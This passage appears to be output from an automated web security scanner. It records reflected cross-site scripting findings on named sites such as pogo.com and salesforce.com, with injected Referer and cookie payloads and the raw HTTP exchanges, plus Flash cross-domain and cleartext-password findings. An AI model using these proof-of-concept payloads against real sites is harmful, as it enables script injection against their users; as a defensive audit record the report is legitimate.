Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.Request
GET /word-games?pageSection Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B Referer: dffd5</script><script |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:59:58 GMT Server: Apache-Coyote/1.1 Content-Length: 106161 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... tIdentifier; s.linkTrackVars=s } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="dffd5</script><script s.eVar2="pogo"; s.pageName="Unauth Category Page filter - word"; s.prop2="pogo"; s.channel="games"; s.eVar18="un_categorybar s.prop7="POGO:games ...[SNIP]... |
3.702. https://www.pogo.com/action/pogo/signin.do [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | https://www.pogo.com |
Path: | /action/pogo/signin.do |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 741b6</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /action/pogo/signin.do Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B Referer: http://www.google.com |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:45:13 GMT Server: Apache-Coyote/1.1 Content-Length: 26203 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Reg A login page"; s.prop2="pogo"; s.channel="pogo"; s.eVar18="un_footer_login s.prop7="POGO:pogo:::Reg A login page:Non Authenticated"; s.prop8="Non Authenticated"; if ...[SNIP]... |
3.703. https://www.pogo.com/action/pogop/heavyregview.do [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | https://www.pogo.com |
Path: | /action/pogop/heavyr |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 551d6</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /action/pogop/heavyr Host: www.pogo.com Connection: keep-alive Referer: http://www.google.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 01:50:16 GMT Server: Apache-Coyote/1.1 Content-Length: 35438 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.eVar30="SOsub_test s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated" ...[SNIP]... |
3.704. https://www.pogo.com/action/pogop/welcome.do [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | https://www.pogo.com |
Path: | /action/pogop/welcome.do |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 414b2</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /action/pogop/welcome.do Host: www.pogo.com Connection: keep-alive Referer: http://www.google.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:34:47 GMT Server: Apache-Coyote/1.1 Content-Length: 35482 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.eVar5="cp_10price_1110 s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.eVar30="SOsub_test s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated" ...[SNIP]... |
3.705. https://www.pogo.com/surveys/processZipSubs.do [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | https://www.pogo.com |
Path: | /surveys/processZipSubs |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52ba1</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /surveys/processZipSubs Host: www.pogo.com Connection: keep-alive Referer: http://www.google.com Cache-Control: max-age=0 Origin: https://www.pogo.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:35:18 GMT Server: Apache-Coyote/1.1 Content-Length: 36950 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.eVar5="cp_10price_1110 s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.eVar30="SOsub_test s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated" ...[SNIP]... |
3.706. https://www.pogo.com/surveys/surveysofferssubs.do [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | https://www.pogo.com |
Path: | /surveys/surveysoffe |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39644</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /surveys/surveysoffe Host: www.pogo.com Connection: keep-alive Referer: http://www.google.com Cache-Control: max-age=0 Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:33:16 GMT Server: Apache-Coyote/1.1 Content-Length: 35517 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.eVar5="cp_10price_1110 s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.eVar30="SOsub_test s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated" ...[SNIP]... |
3.707. http://www.salesforce.com/servlet/servlet.WebToLead [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.salesforce.com |
Path: | /servlet/servlet |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f81c1'-alert(1)-This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /servlet/servlet Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
Response
HTTP/1.1 200 OK Server: SFDC Is-Processed: true Content-Type: text/html Date: Sun, 09 Jan 2011 02:54:03 GMT Connection: close Content-Length: 498 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"> <meta http-equiv="Refresh" content="0; URL=http://www.google.com ...[SNIP]... <script> if (window.location.replace) window.location.replace( } else {; window.location.href ='http://www.google.com } </script> ...[SNIP]... |
3.708. https://www.salesforce.com/servlet/servlet.WebToLead [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | https://www.salesforce |
Path: | /servlet/servlet |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f23e'-alert(1)-This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /servlet/servlet Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
Response
HTTP/1.1 200 OK Server: SFDC Is-Processed: true Content-Type: text/html Date: Sun, 09 Jan 2011 05:28:05 GMT Connection: close Content-Length: 498 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"> <meta http-equiv="Refresh" content="0; URL=http://www.google.com ...[SNIP]... <script> if (window.location.replace) window.location.replace( } else {; window.location.href ='http://www.google.com } </script> ...[SNIP]... |
3.709. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js [ruid cookie] previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://optimized-by |
Path: | /a/4252/4762/6670-15.js |
Issue detail
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5fbf"-alert(1)-This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /a/4252/4762/6670-15.js Host: optimized-by.rubicon Proxy-Connection: keep-alive Referer: http://www.pogo.com/?sl=2 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ruid=a5fbf"-alert(1)- |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:25:48 GMT Server: RAS/1.3 (Unix) Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 03:25:48 GMT; max-age=60; path=/; domain=.rubiconproject Set-Cookie: rdk15=0; expires=Sun, 09-Jan-2011 03:25:48 GMT; max-age=10; path=/; domain=.rubiconproject Set-Cookie: ses15=4762^2; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=106451; path=/; domain=.rubiconproject P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: csi15=3188204.js^1 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Connection: close Content-Type: application/x-javascript Content-Length: 2395 rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document window.rubicon_ad = "3188204" ...[SNIP]... <img src=\"http://trgca.opt ...[SNIP]... |
3.710. http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js [ruid cookie] previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://optimized-by |
Path: | /a/4252/4762/6942-2.js |
Issue detail
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc7a5"-alert(1)-This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /a/4252/4762/6942-2.js?cb Host: optimized-by.rubicon Proxy-Connection: keep-alive Referer: http://www.pogo.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ruid=fc7a5"-alert(1)- |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:25:47 GMT Server: RAS/1.3 (Unix) Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 03:25:47 GMT; max-age=60; path=/; domain=.rubiconproject Set-Cookie: rdk2=0; expires=Sun, 09-Jan-2011 03:25:47 GMT; max-age=10; path=/; domain=.rubiconproject Set-Cookie: ses2=4762^1; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=106452; path=/; domain=.rubiconproject P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: csi2=3156581.js^1 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Connection: close Content-Type: application/x-javascript Content-Length: 2288 rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document window.rubicon_ad = "3156581" ...[SNIP]... <img src=\"http://trgca.opt ...[SNIP]... |
3.711. http://www.e00.peanutlabs.com/js/iFrame/index.php [pl_lang cookie] previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.e00.peanutlabs |
Path: | /js/iFrame/index.php |
Issue detail
The value of the pl_lang cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca65a"%3balert(1)/This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /js/iFrame/index.php Host: www.e00.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.peanutlabs.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=3jamnj3v5l |
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Cache-control: no-cache="set-cookie" Content-Type: text/html Date: Sun, 09 Jan 2011 02:31:56 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Server: Apache Set-Cookie: dob=deleted; expires=Sat, 09-Jan-2010 02:31:55 GMT; path=/; domain=.peanutlabs.com Set-Cookie: sex=deleted; expires=Sat, 09-Jan-2010 02:31:55 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_email=deleted; expires=Sat, 09-Jan-2010 02:31:55 GMT; path=/; domain=.peanutlabs.com Set-Cookie: AWSELB=052955471CE77 Vary: Accept-Encoding,User Connection: keep-alive Content-Length: 112633 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <!-- If ...[SNIP]... .peanutlabs.com/js/iFrame document.write(unescape(" </script> ...[SNIP]... |
3.712. http://www.peanutlabs.com/userGreeting.php [pl_lang cookie] previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.peanutlabs.com |
Path: | /userGreeting.php |
Issue detail
The value of the pl_lang cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ec9f"%3balert(1)/This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /userGreeting.php HTTP/1.1 Host: www.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sex=deleted; pl_email=test4%40fastdial |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:05:24 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: dob=deleted; expires=Sat, 09-Jan-2010 03:05:24 GMT; path=/; domain=.peanutlabs.com Set-Cookie: sex=deleted; expires=Sat, 09-Jan-2010 03:05:24 GMT; path=/; domain=.peanutlabs.com Vary: Accept-Encoding,User Content-Length: 4073 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <!-- If ...[SNIP]... sherId=&ref=60&customCSS= //document.write(''); document.write(unescape(" </script> ...[SNIP]... |
4. Flash cross-domain policy previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://activity |
Path: | /crossdomain.xml |
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain.Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Issue background
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.Request
GET /crossdomain.xml HTTP/1.1 Host: activity.livefaceonweb Proxy-Connection: keep-alive Referer: http://www.topreward Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 18 Feb 2010 19:27:08 GMT Accept-Ranges: bytes ETag: "f019885cd0b0ca1:0" Server: Microsoft-IIS/7.0 Date: Sun, 09 Jan 2011 01:34:43 GMT Content-Length: 199 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> |
5. Cleartext submission of password previous next
There are 24 instances of this issue:
- http://activity.livefaceonweb.com/
- http://diythemes.com/thesis/
- http://mail.cmsinter.net/Login.aspx
- http://malsup.com/jquery/form/
- http://malsup.com/jquery/form/
- http://malsup.com/jquery/form/
- http://malsup.com/jquery/form/
- http://malsup.com/jquery/form/
- http://malsup.com/jquery/form/
- http://online.wsj.com/article/SB100014240
52748704415104576066 830729058232.html - http://online.wsj.com/article/SB100014240
52748704415104576066 830729058232.html - http://revver.com/video/426755/peanut-labs
/ - http://themeforest.net/user/freshface/portfolio
- http://wordpress.org/extend/plugins/wp
-pagenavi/ - http://www.43things.com/person/
- http://www.facebook.com/
- http://www.mlive.com/
- http://www.onestat.com/
- http://www.peanutlabs.com/adminLogin.php
- http://www.pogo.com/
- http://www.pogo.com/account/verify-password
.do - http://www.pogo.com/action/pogo/lightregview
.do - http://www.rockband.com/
- http://www.xanga.com/
Issue background
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.5.1. http://activity.livefaceonweb.com/ previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://activity |
Path: | / |
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:- http://activity
.livefaceonweb.com /default.aspx
- txtPass
Request
GET / HTTP/1.1 Host: activity.livefaceonweb Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Date: Sun, 09 Jan 2011 02:02:02 GMT Connection: close Content-Length: 2896 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><title> ::Live Fa ...[SNIP]... <body> <form name="frmLogin" method="post" action="default.aspx" id="frmLogin"> <div> ...[SNIP]... <td align="left"> <input name="txtPass" type="password" id="txtPass" class="controlTextL" style="width:150px;" /></td> ...[SNIP]... |
5.2. http://diythemes.com/thesis/ previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://diythemes.com |
Path: | /thesis/ |
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:- http://diythemes.com
/amember/login.php
- amember_pass
Request
GET /thesis/ HTTP/1.1 Host: diythemes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
